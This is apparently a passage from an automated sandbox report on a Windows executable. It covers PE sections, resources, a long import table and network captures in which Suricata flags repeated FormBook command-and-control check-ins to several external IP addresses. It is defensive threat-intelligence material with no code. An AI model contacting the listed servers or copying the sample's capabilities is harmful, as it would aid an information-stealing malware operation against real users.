IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0xcd150	0xcd200	a1d5faa32d677af3d40464d505ac047a	False	0.9681989354814138	data	7.970090267202715	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1a2000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0xc4418	data			1.0003184618293641
RT_GROUP_ICON	0x1a0bd0	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1a0c48	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1a0c5c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1a0c70	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1a0c84	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1a0d60	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-16T14:09:27.475976+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49737	3.33.130.190	80	TCP
2024-09-16T14:09:44.001786+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49738	13.228.81.39	80	TCP
2024-09-16T14:09:46.444681+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49739	13.228.81.39	80	TCP
2024-09-16T14:09:49.272587+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49740	13.228.81.39	80	TCP
2024-09-16T14:09:51.823146+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49741	13.228.81.39	80	TCP
2024-09-16T14:09:57.845843+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49742	66.81.203.135	80	TCP
2024-09-16T14:10:00.239412+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49743	66.81.203.135	80	TCP
2024-09-16T14:10:02.777015+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49744	66.81.203.135	80	TCP
2024-09-16T14:10:05.492878+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49745	66.81.203.135	80	TCP
2024-09-16T14:10:11.893578+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49746	103.42.108.46	80	TCP
2024-09-16T14:10:14.427132+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49747	103.42.108.46	80	TCP
2024-09-16T14:10:16.973767+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49748	103.42.108.46	80	TCP
2024-09-16T14:10:19.513153+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49749	103.42.108.46	80	TCP
2024-09-16T14:10:25.330977+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49750	3.33.130.190	80	TCP
2024-09-16T14:10:28.222828+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49751	3.33.130.190	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 16, 2024 14:09:26.998363972 CEST	49737	80	192.168.2.4	3.33.130.190
Sep 16, 2024 14:09:27.003321886 CEST	80	49737	3.33.130.190	192.168.2.4
Sep 16, 2024 14:09:27.005256891 CEST	49737	80	192.168.2.4	3.33.130.190
Sep 16, 2024 14:09:27.011771917 CEST	49737	80	192.168.2.4	3.33.130.190
Sep 16, 2024 14:09:27.016701937 CEST	80	49737	3.33.130.190	192.168.2.4
Sep 16, 2024 14:09:27.475565910 CEST	80	49737	3.33.130.190	192.168.2.4
Sep 16, 2024 14:09:27.475897074 CEST	80	49737	3.33.130.190	192.168.2.4
Sep 16, 2024 14:09:27.475975990 CEST	49737	80	192.168.2.4	3.33.130.190
Sep 16, 2024 14:09:27.479140997 CEST	49737	80	192.168.2.4	3.33.130.190
Sep 16, 2024 14:09:27.483968019 CEST	80	49737	3.33.130.190	192.168.2.4
Sep 16, 2024 14:09:42.969304085 CEST	49738	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:42.974111080 CEST	80	49738	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:42.974212885 CEST	49738	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:42.982590914 CEST	49738	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:42.987601042 CEST	80	49738	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:44.001677990 CEST	80	49738	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:44.001724958 CEST	80	49738	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:44.001760006 CEST	80	49738	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:44.001785994 CEST	49738	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:44.001832008 CEST	49738	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:44.497550964 CEST	49738	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:45.517168999 CEST	49739	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:45.522398949 CEST	80	49739	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:45.522517920 CEST	49739	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:45.531703949 CEST	49739	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:45.536524057 CEST	80	49739	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:46.444582939 CEST	80	49739	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:46.444613934 CEST	80	49739	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:46.444680929 CEST	49739	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:47.044204950 CEST	49739	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:48.063065052 CEST	49740	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:48.304601908 CEST	80	49740	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:48.304867983 CEST	49740	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:48.319118977 CEST	49740	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:48.319147110 CEST	49740	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:48.325062990 CEST	80	49740	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:48.325079918 CEST	80	49740	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:48.325093031 CEST	80	49740	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:48.325105906 CEST	80	49740	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:48.325117111 CEST	80	49740	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:48.326181889 CEST	80	49740	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:48.326241970 CEST	80	49740	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:48.326255083 CEST	80	49740	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:48.326268911 CEST	80	49740	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:49.261487961 CEST	80	49740	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:49.272476912 CEST	80	49740	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:49.272587061 CEST	49740	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:49.825654984 CEST	49740	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:50.843647003 CEST	49741	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:50.849283934 CEST	80	49741	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:50.849381924 CEST	49741	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:50.855022907 CEST	49741	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:50.859869003 CEST	80	49741	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:51.823002100 CEST	80	49741	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:51.823055029 CEST	80	49741	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:51.823146105 CEST	49741	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:51.826096058 CEST	49741	80	192.168.2.4	13.228.81.39
Sep 16, 2024 14:09:51.830909967 CEST	80	49741	13.228.81.39	192.168.2.4
Sep 16, 2024 14:09:57.099359989 CEST	49742	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:09:57.105684996 CEST	80	49742	66.81.203.135	192.168.2.4
Sep 16, 2024 14:09:57.105871916 CEST	49742	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:09:57.115313053 CEST	49742	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:09:57.121388912 CEST	80	49742	66.81.203.135	192.168.2.4
Sep 16, 2024 14:09:57.845737934 CEST	80	49742	66.81.203.135	192.168.2.4
Sep 16, 2024 14:09:57.845762968 CEST	80	49742	66.81.203.135	192.168.2.4
Sep 16, 2024 14:09:57.845777988 CEST	80	49742	66.81.203.135	192.168.2.4
Sep 16, 2024 14:09:57.845843077 CEST	49742	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:09:57.845892906 CEST	49742	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:09:58.622530937 CEST	49742	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:09:59.641141891 CEST	49743	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:09:59.647129059 CEST	80	49743	66.81.203.135	192.168.2.4
Sep 16, 2024 14:09:59.647267103 CEST	49743	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:09:59.662605047 CEST	49743	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:09:59.667447090 CEST	80	49743	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:00.239196062 CEST	80	49743	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:00.239229918 CEST	80	49743	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:00.239412069 CEST	49743	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:10:01.170494080 CEST	49743	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:10:02.189071894 CEST	49744	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:10:02.193955898 CEST	80	49744	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:02.194120884 CEST	49744	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:10:02.205389023 CEST	49744	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:10:02.210292101 CEST	80	49744	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:02.210303068 CEST	80	49744	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:02.210319042 CEST	80	49744	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:02.210325956 CEST	80	49744	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:02.210334063 CEST	80	49744	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:02.210365057 CEST	80	49744	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:02.210453033 CEST	80	49744	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:02.210494995 CEST	80	49744	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:02.210503101 CEST	80	49744	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:02.776320934 CEST	80	49744	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:02.776931047 CEST	80	49744	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:02.777014971 CEST	49744	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:10:03.718913078 CEST	49744	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:10:04.734496117 CEST	49745	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:10:04.794548035 CEST	80	49745	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:04.794624090 CEST	49745	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:10:04.803349972 CEST	49745	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:10:04.809153080 CEST	80	49745	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:05.492681980 CEST	80	49745	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:05.492705107 CEST	80	49745	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:05.492719889 CEST	80	49745	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:05.492728949 CEST	80	49745	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:05.492877960 CEST	49745	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:10:05.492877960 CEST	49745	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:10:05.495527983 CEST	49745	80	192.168.2.4	66.81.203.135
Sep 16, 2024 14:10:05.500324965 CEST	80	49745	66.81.203.135	192.168.2.4
Sep 16, 2024 14:10:11.010912895 CEST	49746	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:11.016987085 CEST	80	49746	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:11.017065048 CEST	49746	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:11.025856972 CEST	49746	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:11.030678988 CEST	80	49746	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:11.893394947 CEST	80	49746	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:11.893426895 CEST	80	49746	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:11.893578053 CEST	49746	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:12.536194086 CEST	49746	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:13.550121069 CEST	49747	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:13.555690050 CEST	80	49747	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:13.555789948 CEST	49747	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:13.570199966 CEST	49747	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:13.575536013 CEST	80	49747	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:14.426527023 CEST	80	49747	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:14.426908970 CEST	80	49747	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:14.427131891 CEST	49747	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:15.075613976 CEST	49747	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:16.094165087 CEST	49748	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:16.099093914 CEST	80	49748	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:16.099203110 CEST	49748	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:16.109509945 CEST	49748	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:16.114526033 CEST	80	49748	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:16.114581108 CEST	80	49748	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:16.114590883 CEST	80	49748	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:16.114722013 CEST	80	49748	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:16.114833117 CEST	80	49748	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:16.114841938 CEST	80	49748	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:16.114918947 CEST	80	49748	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:16.115101099 CEST	80	49748	103.42.108.46	192.168.2.4
